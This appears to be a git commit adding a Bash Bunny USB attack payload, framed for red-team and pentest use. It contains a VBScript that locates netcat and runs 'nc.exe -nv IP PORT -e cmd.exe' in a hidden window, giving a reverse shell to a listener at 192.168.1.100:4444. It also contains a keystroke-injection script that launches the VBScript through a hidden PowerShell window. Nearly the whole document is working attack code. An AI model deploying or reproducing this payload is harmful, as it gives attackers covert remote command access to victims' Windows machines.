RAZ_VBScript
This payload executes a VBScript as the payload. The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted. netcat.exe must be sourced elsewhere.pull/40/head
parent
3bc10fa135
commit
938be26260
|
@ -0,0 +1,162 @@
|
|||
Option Explicit
|
||||
|
||||
'==============================================================================
|
||||
' Title: a.vbs
|
||||
' Author: RalphyZ
|
||||
' Version: 1.0
|
||||
' Target: Windows 7+
|
||||
'
|
||||
' Description:
|
||||
' This VBScript is used by a BashBunny payload to
|
||||
' to create a netcat reverse shell. The netcat listener
|
||||
' IP Address and Port are stored in separate files - so that
|
||||
' Red Teams can quickly change information. The "IncrementPort"
|
||||
' subroutine will increase the port number by 1 every time the
|
||||
' script is called. This is so that you can start multiple
|
||||
' listeners while doing a PenTest, and grab multiple reverse
|
||||
' shells in one trip. Uncomment that if you want the auto-increment
|
||||
'
|
||||
' Note: You must put the netcat executable in the strReverseShellPath directory
|
||||
'==============================================================================
|
||||
|
||||
' Declare Constants
|
||||
Const ForReading = 1
|
||||
Const ForWriting = 2
|
||||
|
||||
' Declare Global Variables
|
||||
Dim strListenerPort, strNewListenerPort, strListenerIP
|
||||
Dim objFSO, objFile, strCurrentDirectory
|
||||
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
|
||||
|
||||
' The netcat executable name
|
||||
strNetCatEXE = "nc.exe"
|
||||
|
||||
' The folder location
|
||||
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
|
||||
|
||||
' The file containing the listener port
|
||||
strListnerPortFile = "listener_port.txt"
|
||||
|
||||
' The file containing the listener ip address
|
||||
strListenerIPFile = "listener_ip.txt"
|
||||
|
||||
' Create a File System Object
|
||||
Set objFSO = CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
strCurrentDirectory = FindCurrentDirectory()
|
||||
|
||||
' Read the Host IP Address (where the listener resides)
|
||||
ReadHostIP
|
||||
|
||||
' Read the listener port
|
||||
ReadPort
|
||||
|
||||
' Increment the listener port - for multiple shells
|
||||
' Great for Red Teams
|
||||
'IncrementPort
|
||||
|
||||
' Start NetCat Reverse Shell
|
||||
StartNetCat
|
||||
|
||||
'==============================================================================
|
||||
' Name: FindCurrentDirectory
|
||||
' Arguments: None
|
||||
' Return Value: None
|
||||
' Description: Find the netcat executable
|
||||
'==============================================================================
|
||||
Function FindCurrentDirectory
|
||||
Dim objDrives, d
|
||||
|
||||
' Set default return value
|
||||
FindCurrentDirectory = ""
|
||||
|
||||
' Search all drives for the netcat exe
|
||||
Set objDrives = objFSO.Drives
|
||||
For Each d in objDrives
|
||||
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
|
||||
FindCurrentDirectory = d + strReverseShellPath
|
||||
End if
|
||||
Next
|
||||
End Function
|
||||
|
||||
'==============================================================================
|
||||
' Name: ReadHostIP
|
||||
' Arguments: None
|
||||
' Return Value: None
|
||||
' Description: Read the listener IP
|
||||
'==============================================================================
|
||||
Sub ReadHostIP()
|
||||
' Opens the file for reading
|
||||
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
|
||||
|
||||
' Read the host IP
|
||||
strListenerIP = objFile.ReadAll
|
||||
|
||||
' Close the file
|
||||
objFile.Close
|
||||
End Sub
|
||||
|
||||
|
||||
'==============================================================================
|
||||
' Name: ReadPort
|
||||
' Arguments: None
|
||||
' Return Value: None
|
||||
' Description: Read the listener port
|
||||
'==============================================================================
|
||||
Sub ReadPort()
|
||||
' Opens the file for reading
|
||||
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
|
||||
|
||||
' Read the listener port
|
||||
strListenerPort = objFile.ReadAll
|
||||
|
||||
' Close the file
|
||||
objFile.Close
|
||||
End Sub
|
||||
|
||||
'==============================================================================
|
||||
' Name: IncrementPort
|
||||
' Arguments: None
|
||||
' Return Value: None
|
||||
' Description: Read the listener port, increment the counter by 1, and write
|
||||
' the new value
|
||||
'==============================================================================
|
||||
Sub IncrementPort()
|
||||
' Increment the listener port
|
||||
strNewListenerPort = strListenerPort + 1
|
||||
|
||||
' Open the file that contains the listener port for writing
|
||||
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
|
||||
|
||||
' Write the new (incremented) port
|
||||
objFile.WriteLine strNewListenerPort
|
||||
|
||||
' Close the file
|
||||
objFile.Close
|
||||
End Sub
|
||||
|
||||
'==============================================================================
|
||||
' Name: StartNetCat
|
||||
' Arguments: None
|
||||
' Return Value: None
|
||||
' Description: Start netcat on the appropriate port
|
||||
'==============================================================================
|
||||
Sub StartNetCat()
|
||||
Dim strNetCat, strCommand, objShell
|
||||
|
||||
' Build the path to the netcat executable
|
||||
strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
|
||||
|
||||
' Create the command string to run netcat on the correct ip and port,
|
||||
' and serve cmd.exe to the listener
|
||||
strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
|
||||
|
||||
' Create the WScript Shell object
|
||||
Set objShell = WScript.CreateObject ("WScript.Shell")
|
||||
|
||||
' Run the command (' , 0'= hidden)
|
||||
objShell.run strCommand, 0
|
||||
|
||||
' Free the object from memory
|
||||
Set objShell = Nothing
|
||||
End Sub
|
|
@ -0,0 +1 @@
|
|||
192.168.1.100
|
|
@ -0,0 +1 @@
|
|||
4444
|
|
@ -0,0 +1,35 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: RAZ_VBScript
|
||||
# Author: RalphyZ
|
||||
# Version: 1.0
|
||||
# Target: Windows 7+
|
||||
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
||||
#
|
||||
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
||||
#
|
||||
# Colors:
|
||||
# Green.....................Working
|
||||
# White.....................Completed without error
|
||||
# Light-Blue (blinking).....a.vbs was not found
|
||||
|
||||
LED G
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
# Get the switch position
|
||||
source bunny_helpers.sh
|
||||
|
||||
# Check if a.vbs is present
|
||||
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
||||
LED B G 100
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Run the VBScript
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
|
||||
QUACK ENTER
|
||||
|
||||
# Green LED for finished
|
||||
LED R G B
|
Loading…
Reference in New Issue